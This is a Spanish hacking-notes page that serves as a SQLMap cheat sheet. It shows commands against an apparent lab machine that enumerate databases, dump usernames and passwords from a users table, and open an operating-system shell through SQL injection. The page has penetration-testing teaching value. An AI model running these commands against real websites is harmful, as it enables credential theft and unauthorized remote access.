> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/hacking-tools/web/sqlmap.md).

# SQLMap

{% hint style="info" %}
**SQLMap** es una herramienta de pruebas de penetración de código abierto diseñada específicamente para detectar y explotar vulnerabilidades de inyección SQL en aplicaciones web. Automatiza el proceso de detección y explotación de vulnerabilidades SQL mediante la interacción con las bases de datos subyacentes. SQLMap es utilizada por profesionales de la seguridad informática e investigadores de seguridad para evaluar la seguridad de las aplicaciones web identificando y explotando vulnerabilidades de seguridad relacionadas con SQL.
{% endhint %}

## Flujo de trabajo de SQLMap

1. Captura o construye la solicitud vulnerable, incluidas las cookies, los encabezados y el parámetro inyectable.
2. Obtén la huella del SGBD cuando sea posible y ajusta `--risk`, `--level`, y `--dbms` solo después de confirmar el comportamiento.
3. Enumera bases de datos, tablas, columnas y registros objetivo con el menor alcance de consulta que demuestre el impacto.
4. Volca solo los datos necesarios para el objetivo de la evaluación y conserva la línea de comandos exacta para el informe.
5. Valida el hallazgo manualmente cuando el informe necesite una prueba de concepto mínima sin automatización.

## Operaciones comunes de SQLMap

## Lista las bases de datos:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --dbs --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"
```

<figure><img src="/files/026afc3554e879df15d9a8c6c37d3227c7376dae" alt=""><figcaption></figcaption></figure>

## Buscar tablas en una base de datos dada:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --tables --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"
```

<figure><img src="/files/fd48831198d6f35f53e5cfdba21ba7b19e5e1bb3" alt=""><figcaption></figcaption></figure>

## Encontrar columnas en una tabla específica:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --columns --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"
```

<figure><img src="/files/59c3de8cc7dd102ec7f2df1ffa1e965ded13c1fa" alt=""><figcaption></figcaption></figure>

## Volcar usuarios y contraseñas de la tabla "users":

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --columns --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" -T users -C username,password --dump
```

<figure><img src="/files/d5073da657a41d015f91aa3db24a484d9cc7b380" alt=""><figcaption></figcaption></figure>

## Consola interactiva:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" --os-shell --batch
```

## Parámetros interesantes:

#### Establecer el riesgo y la profundidad del ataque:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" --dbms mysql --risk 3 --level 4
```

#### Si conocemos el tipo de base de datos con el parámetro:

<pre class="language-bash"><code class="lang-bash"><strong>--dbms mysql
</strong></code></pre>

#### Para probar todos los tipos de ataques sin hacer una solicitud cada vez:

```bash
--batch
```

### Todas las notas

<table><thead><tr><th data-type="content-ref"></th></tr></thead><tbody><tr><td><a href="/pages/edeb4233dbc9997c76c0e392e92f20e0b26aac68">/pages/edeb4233dbc9997c76c0e392e92f20e0b26aac68</a></td></tr><tr><td><a href="/pages/bb1c71adf4c5c12161dd81a2d0c0d2d02a202b17">/pages/bb1c71adf4c5c12161dd81a2d0c0d2d02a202b17</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/hacking-tools/web/sqlmap.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
